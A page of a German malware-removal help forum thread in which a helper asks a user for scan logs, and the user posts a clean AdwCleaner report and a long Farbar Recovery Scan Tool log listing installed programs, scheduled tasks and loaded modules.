Trojaner-Board
Seite 2 von 3 1 2 3
100 Beiträge dieses Themas auf einer Seite anzeigen

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Tr/dropper.gen - Herunterfahren nicht mehr möglich (https://www.trojaner-board.de/183244-tr-dropper-gen-herunterfahren-mehr-moeglich.html)

cosinus 03.12.2016 00:34
Da ist ja immer noch was...:wtf:..rebooten und adwCleaner nochmal

Machalla666 03.12.2016 02:34
Sorry war zwischendurch eingenickt >_<
Hoffentlich letztes adwcleaner Log:
Code:
# AdwCleaner v6.030 - Bericht erstellt am 03/12/2016 um 02:33:47
# Aktualisiert am 19/10/2016 von Malwarebytes
# Datenbank : 2016-12-02.1 [Server]
# Betriebssystem : Windows 10 Home  (X64)
# Benutzername : Patrick - DESKTOP-I54T4B7
# Gestartet von : C:\Users\Patrick\Desktop\AdwCleaner_6.030.exe
# Modus: Suchlauf
# Unterstützung : https://www.malwarebytes.com/support



***** [ Dienste ] *****

Keine schädlichen Dienste gefunden.


***** [ Ordner ] *****

Keine schädlichen Ordner gefunden.


***** [ Dateien ] *****

Keine schädlichen Dateien gefunden.


***** [ DLL ] *****

Keine infizierten DLLs gefunden.


***** [ WMI ] *****

Keine schädlichen Schlüssel gefunden.


***** [ Verknüpfungen ] *****

Keine infizierten Verknüpfungen gefunden.


***** [ Aufgabenplanung ] *****

Keine schädlichen Aufgaben gefunden.


***** [ Registrierungsdatenbank ] *****

Keine schädlichen Elemente in der Registrierungsdatenbank gefunden.


***** [ Internetbrowser ] *****

Keine schädlichen Elemente in Firefox basierten Browsern gefunden.
Keine schädlichen Elemente in Chrome basierten Browsern gefunden.

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [7384 Bytes] - [02/12/2016 23:13:52]
C:\AdwCleaner\AdwCleaner[C2].txt - [3427 Bytes] - [02/12/2016 23:41:24]
C:\AdwCleaner\AdwCleaner[S0].txt - [13988 Bytes] - [02/12/2016 23:09:48]
C:\AdwCleaner\AdwCleaner[S1].txt - [6849 Bytes] - [02/12/2016 23:12:31]
C:\AdwCleaner\AdwCleaner[S2].txt - [3817 Bytes] - [02/12/2016 23:40:53]
C:\AdwCleaner\AdwCleaner[S3].txt - [1564 Bytes] - [03/12/2016 02:33:47]

########## EOF - C:\AdwCleaner\AdwCleaner[S3].txt - [1637 Bytes] ##########
Ich mach für heute Feierabend. Die nächste Anweisung werde ich erst morgen früh bearbeiten können.
Ich muss mich mal sehr bei dir bedanken cosinus, dass du dir so spät und trotz meiner Schusseligkeit,
dir so viel Mühe gibst.

cosinus 03.12.2016 17:49
Dann zeig mal frische FRST Logs. Haken setzen bei addition.txt dann auf Untersuchen klicken

http://www.trojaner-board.de/picture...&pictureid=611

Machalla666 03.12.2016 19:44
Okidoki, hier die addition.txt:

Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02-12-2016
durchgeführt von Patrick (03-12-2016 19:42:08)
Gestartet von C:\Users\Patrick\Desktop
Windows 10 Home Version 1607 (X64) (2016-09-24 15:36:30)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3097098544-2319845998-2187571786-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3097098544-2319845998-2187571786-503 - Limited - Disabled)
Gast (S-1-5-21-3097098544-2319845998-2187571786-501 - Limited - Disabled)
Patrick (S-1-5-21-3097098544-2319845998-2187571786-1001 - Administrator - Enabled) => C:\Users\Patrick

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 15.020.20042 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 23.0.0.257 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Adobe Flash Player 23 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Ansel (Version: 375.95 - NVIDIA Corporation) Hidden
Broadcom Card Reader Driver Installer (HKLM\...\{67AA948F-8D83-4566-B84A-7CAABCF64E3F}) (Version: 16.0.2.8 - Broadcom Corporation)
Cavern Kings (HKLM-x32\...\Steam App 321830) (Version:  - Vine)
CCleaner (HKLM\...\CCleaner) (Version: 5.22 - Piriform)
Course Vector .minerva (HKLM-x32\...\com.coursevector.minerva) (Version: 3.5.0 - UNKNOWN)
Course Vector .minerva (x32 Version: 3.5.0 - UNKNOWN) Hidden
CrossCode (HKLM\...\Steam App 368340) (Version:  - Radical Fish Games)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.4.0.0196 - Disc Soft Ltd)
Death Road to Canada (HKLM\...\Steam App 252610) (Version:  - Rocketcat Games)
Deathstate (HKLM-x32\...\Steam App 402120) (Version:  - Workinman Interactive, LLC.)
DLC Quest (HKLM\...\Steam App 230050) (Version:  - Going Loud Studios)
Dritek Radio Controller (HKLM-x32\...\RadioController) (Version: 2.02.2001.0803 - Dritek System Inc.)
Dungeon Souls (HKLM-x32\...\Steam App 383230) (Version:  - Mike Studios)
ELAN Touchpad 11.15.0.18_X64 (HKLM\...\Elantech) (Version: 11.15.0.18 - ELAN Microelectronic Corp.)
Extended Asian Language font pack for Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-2530-0000-AC0F074E4100}) (Version: 15.007.20033 - Adobe Systems Incorporated)
FreeCAD 0.15 - A free open source CAD system (HKLM\...\FreeCAD 0.15) (Version: 0.15.4671 - Juergen Riegel)
Ghost 1.0 (HKLM\...\Steam App 463270) (Version:  - @unepic_fran)
Good Robot (HKLM\...\Steam App 358830) (Version:  - Pyrodactyl)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Hammerwatch (HKLM\...\Steam App 239070) (Version:  - Crackshell)
Hero Siege (HKLM-x32\...\Steam App 269210) (Version:  - Elias Viglione)
HiSuite (HKLM-x32\...\Hi Suite) (Version: 1.0 - Huawei Technologies Co.,Ltd)
Hyper Light Drifter (HKLM\...\Steam App 257850) (Version:  - Heart Machine)
Hyperdimension Neptunia Re;Birth1 (HKLM\...\Steam App 282900) (Version:  - Idea Factory, Inc.)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Iron Fisticle (HKLM-x32\...\Steam App 306700) (Version:  - Confused Pelican)
Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Jets'n'Guns Gold (HKLM\...\Steam App 262260) (Version:  - Rake in Grass)
KeyShot 5 64 bit (HKLM-x32\...\KeyShot 5_64) (Version: 5.0 64 bit - Luxion ApS)
KH Ultra Trainer (HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\4f344c4511ef18b2) (Version: 0.1.0.74 - KongHack)
Leap of Fate (HKLM\...\Steam App 363420) (Version:  - Clever-Plays)
Legends of Pixelia (HKLM\...\Steam App 371530) (Version:  - SimaGames)
LINE (HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\LINE) (Version: 4.10.2.1257 - LINE Corporation)
Magicians & Looters (HKLM\...\Steam App 284180) (Version:  - Morgopolis Studios)
MEGAsync (HKLM-x32\...\MEGAsync) (Version:  - Mega Limited)
Mercenary Kings (HKLM\...\Steam App 218820) (Version:  - Tribute Games Inc.)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM-x32\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Rechner-Plus (HKLM-x32\...\{437C19B3-7E20-4E39-B868-CA6BAA820E1C}) (Version: 1.0.0 - Microsoft)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 50.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 50.0.2 (x86 de)) (Version: 50.0.2 - Mozilla)
NFOPad 1.7 (HKLM-x32\...\NFOPad) (Version: 1.7 - True Human Design)
NVIDIA GeForce Experience 3.1.0.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.1.0.52 - NVIDIA Corporation)
NVIDIA Grafiktreiber 375.95 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 375.95 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (Version: 3.1.0.52 - NVIDIA Corporation) Hidden
NvTelemetry (Version: 1.2.0.0 - NVIDIA Corporation) Hidden
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
PAC-MAN Championship Edition DX+ (HKLM\...\Steam App 236450) (Version:  - Mine Loader Software Co., Ltd.)
Paranautical Activity: Deluxe Atonement Edition (HKLM\...\Steam App 250580) (Version:  - Digerati Distribution)
Phantom Breaker: Battle Grounds (HKLM\...\Steam App 329490) (Version:  - MAGES.)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.)
Princess.Loot.Pixel.Again (HKLM\...\Steam App 414290) (Version:  - EfimovMax)
QQ International (HKLM-x32\...\{3CA54984-A14B-42FE-9FF1-7EA90151D725}) (Version: 1.91.1369.0 - Tencent Technology(Shenzhen) Company Limited)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.305 - Qualcomm Atheros Communications)
Qualcomm Atheros WiFi Driver Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 12.05 - Qualcomm Atheros)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7040 - Realtek Semiconductor Corp.)
Risk of Rain (HKLM-x32\...\Steam App 248820) (Version:  - )
Roguelands (HKLM\...\Steam App 364420) (Version:  - SmashGames)
Saints Row IV (HKLM\...\Steam App 206420) (Version:  - Deep Silver Volition)
Saints Row: The Third (HKLM-x32\...\Steam App 55230) (Version:  - Volition)
SDFormatter (HKLM-x32\...\{179324FF-7B16-4BA8-9836-055CAAEE4F08}) (Version: 4.0.0 - SD Association)
SHIELD Streaming (Version: 7.1.0330 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 3.1.0.52 - NVIDIA Corporation) Hidden
Sid Meier's Civilization V (HKLM\...\Steam App 8930) (Version:  - Firaxis Games)
Sid Meier's Civilization V (HKLM-x32\...\steam app 8930) (Version:  - 2K Games, Inc.)
SlimDX Runtime .NET 4.0 x86 (January 2012) (HKLM-x32\...\{7EBD0E43-6AC0-4CA8-9990-00E50069AD29}) (Version: 2.0.13.43 - SlimDX Group)
SnapDo (HKLM-x32\...\{B6F4B21E-05B2-4C3C-A415-123F6A8B7CF7}) (Version: 1.0.0.0 - Resoft) <==== ACHTUNG
Solid Edge ST8 (HKLM\...\{C69F7B10-60F2-476C-B0C1-4D61628462B7}) (Version: 108.00.00091 - Siemens)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
The Binding of Isaac: Rebirth (HKLM-x32\...\Steam App 250900) (Version:  - Nicalis, Inc.)
Unity Web Player (HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\UnityWebPlayer) (Version: 5.3.1f1 - Unity Technologies ApS)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM-x32\...\{90120000-0016-0407-0000-0000000FF1CE}_ENTERPRISE_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version:  - Microsoft)
Update für Microsoft Office Outlook 2007 Help (KB963677) (HKLM-x32\...\{90120000-001A-0407-0000-0000000FF1CE}_ENTERPRISE_{F6828576-6F79-470D-AB50-69D1BBADBD30}) (Version:  - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM-x32\...\{90120000-0018-0407-0000-0000000FF1CE}_ENTERPRISE_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version:  - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM-x32\...\{90120000-001B-0407-0000-0000000FF1CE}_ENTERPRISE_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version:  - Microsoft)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Void Raiders (HKLM\...\Steam App 445600) (Version:  - Tryzna83)
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
Vuze (HKLM\...\8461-7759-5462-8226) (Version: 5.7.4.0 - Azureus Software, Inc.)
WBFS Manager 3.0 (HKLM-x32\...\WBFS Manager 3.0) (Version: 3.0 - AlexDP)
WinRAR 5.30 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
Witch & Hero(魔女と勇者) (HKLM\...\Steam App 434130) (Version:  - FK Digital)
Yandex (HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\YandexBrowser) (Version: 16.10.1.1114 - YANDEX)
Ziggurat (HKLM-x32\...\Steam App 308420) (Version:  - Milkstone Studios)
シロクロ家出ギャル 泊めてくれたらなんでもするよ (HKLM-x32\...\エルフを飼うオーク「おめぇにゃオラの仔をたぁんと産んでもらうだよ」) (Version: 1.0.0 - α-MODEL)
搜狗拼音输入法 8.1正式版 (HKLM-x32\...\Sogou Input) (Version: 8.1.0.8588 - Sogou.com)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
CustomCLSID: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001_Classes\CLSID\{F654F1BF-54D9-4A2E-B703-889091D3CB2D}\InprocServer32 -> c:\cimatron e13\program\cimpreviewhandler.dll => Keine Datei

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0CF6A2CF-4CE5-4A2B-8FA9-4E54567A63ED} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)
Task: {285F40BD-A904-40FA-951B-ABB14BB69D51} - System32\Tasks\IntelMemoryDiagnostic => C:\Users\Patrick\AppData\Roaming\d3dx10.exe [2015-08-13] () <==== ACHTUNG
Task: {33AB4AFF-944D-474A-AE6F-66B7CF4F8590} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-22] (Google Inc.)
Task: {342309AA-8AD2-46DB-A6EA-5D51C5CE2E77} - System32\Tasks\klcp_update => C:\Program Files\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2016-11-10] ()
Task: {3CFDDE66-A51F-4118-A971-B2784A2C099E} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWoW64\Macromed\Flash\FlashUtil32_23_0_0_207_pepper.exe [2016-11-19] (Adobe Systems Incorporated)
Task: {55687776-EE70-4178-BD30-F45518292757} - System32\Tasks\Update for Yandex Browser => C:\Users\Patrick\AppData\Local\Yandex\YandexBrowser\Application\browser.exe [2016-11-09] (YANDEX LLC)
Task: {5FEFC0D8-B25C-42C7-B193-C7EC237931F7} - System32\Tasks\{6BA690B0-1A65-4FE1-B843-96EDE2B0A4C7} => pcalua.exe -a C:\WINDOWS\eiunin21.exe -c "D:\Games\ShiroKuro Iede Gyaru Tomete\Game\Setup.DAT"
Task: {62755CD6-6F88-4E68-92CC-12876715E12E} - System32\Tasks\Aktualisierung von Yandex Browser => C:\Users\Patrick\AppData\Local\Yandex\YandexBrowser\Application\browser.exe [2016-11-09] (YANDEX LLC)
Task: {7B8ADF7F-61F3-481A-83D1-8974A93B80FD} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2016-03-21] (Safer-Networking Ltd.)
Task: {88FCB513-78C2-494C-97B8-1C2E1CA04A1B} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2016-03-21] (Safer-Networking Ltd.)
Task: {8FB13BC2-5CED-434B-ABFC-E8CA8B7A9D4A} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2016-10-25] (NVIDIA Corporation)
Task: {907420C3-5A7F-4040-91F9-F0F26291B9FC} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2016-10-25] (NVIDIA Corporation)
Task: {9EE9C5DF-42DC-48AD-88CD-94D1A7A7CECB} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-08-26] (Piriform Ltd)
Task: {A78E230A-4226-4614-841C-F6F78BEB70E9} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2016-10-25] (NVIDIA Corporation)
Task: {A9FD5CD3-9A97-4881-A0BB-7480C51A19E9} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-11-08] (Microsoft Corporation)
Task: {BA657DC5-B244-4FF5-BD25-8005343FB1DD} - System32\Tasks\Systemaktualisierung von Yandex Browser => C:\Program Files (x86)\Yandex\YandexBrowser\16.10.1.1114\service_update.exe [2016-11-09] (YANDEX LLC)
Task: {C056C44B-8F15-4448-92C2-56E043A73A80} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2016-10-25] (NVIDIA Corporation)
Task: {D1DCFEBF-0295-4E80-94CF-F369B3C71B4B} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2016-10-25] (NVIDIA Corporation)
Task: {DECEDBFC-2CA1-4EC6-B86D-83093585DC17} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-22] (Google Inc.)
Task: {EF0AAD5A-2E96-411C-87E4-C07B504C01A8} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2016-10-25] (NVIDIA Corporation)
Task: {F0AE3619-7E9F-47D2-B095-38C29BBC4059} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2014-06-27] (Safer-Networking Ltd.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\SysWoW64\Macromed\Flash\FlashUtil32_23_0_0_207_pepper.exe
Task: C:\WINDOWS\Tasks\Aktualisierung von Yandex Browser.job => C:\Users\Patrick\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Systemaktualisierung von Yandex Browser.job => C:\Program Files (x86)\Yandex\YandexBrowser\16.10.1.1114\service_update.exe
Task: C:\WINDOWS\Tasks\Update for Yandex Browser.job => C:\Users\Patrick\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2016-11-06 17:39 - 2014-06-26 11:55 - 00066480 _____ () C:\WINDOWS\System32\bgspm64.dll
2016-11-06 09:21 - 2016-11-06 09:21 - 00312320 _____ () C:\Program Files\BitTorrent\BitTorrent.exe
2016-08-26 10:08 - 2016-08-26 10:08 - 00192200 _____ () C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe
2016-09-24 16:48 - 2016-10-25 21:21 - 01148984 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-09-24 16:48 - 2016-10-25 21:21 - 04490808 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll
2016-09-24 16:48 - 2016-10-25 21:21 - 00420408 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\plugins\LocalSystem\_nvspserviceplugin64.dll
2016-12-02 23:06 - 2016-12-03 11:06 - 00229376 _____ () C:\WINDOWS\TEMP\netstream.exe
2016-07-16 12:42 - 2016-07-16 12:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-09-29 20:12 - 2016-09-15 18:25 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-11-19 03:15 - 2016-11-17 02:03 - 00133056 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-09-29 20:12 - 2016-09-15 18:25 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-09-29 20:12 - 2016-09-15 18:25 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-24 16:38 - 2016-09-24 16:38 - 00959168 _____ () C:\Users\Patrick\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\ClientTelemetry.dll
2014-05-01 15:13 - 2016-11-22 17:47 - 00592384 _____ () C:\Users\Patrick\AppData\Local\MEGAsync\ShellExtX64.dll
2016-09-24 17:22 - 2016-09-24 17:22 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-11-10 06:36 - 2016-11-02 11:30 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-11-10 06:35 - 2016-11-02 11:21 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-11-10 06:35 - 2016-11-02 11:15 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-11-10 06:35 - 2016-11-02 11:14 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-11-10 06:35 - 2016-11-02 11:15 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-11-10 06:35 - 2016-11-02 11:17 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2013-09-07 01:48 - 2013-09-07 01:48 - 00011264 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\ActivateDesktopDebugger\ActivateDesktopDebugger.dll
2013-09-07 01:45 - 2013-09-07 01:45 - 00086016 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\Map\MAP.dll
2013-09-07 01:52 - 2013-09-07 01:52 - 00012928 _____ () C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe
2016-09-30 15:58 - 2014-05-19 18:10 - 03386880 _____ () C:\Program Files (x86)\UtechSmart 16400DPI VENUS Gaming Mouse\OGMMon.exe
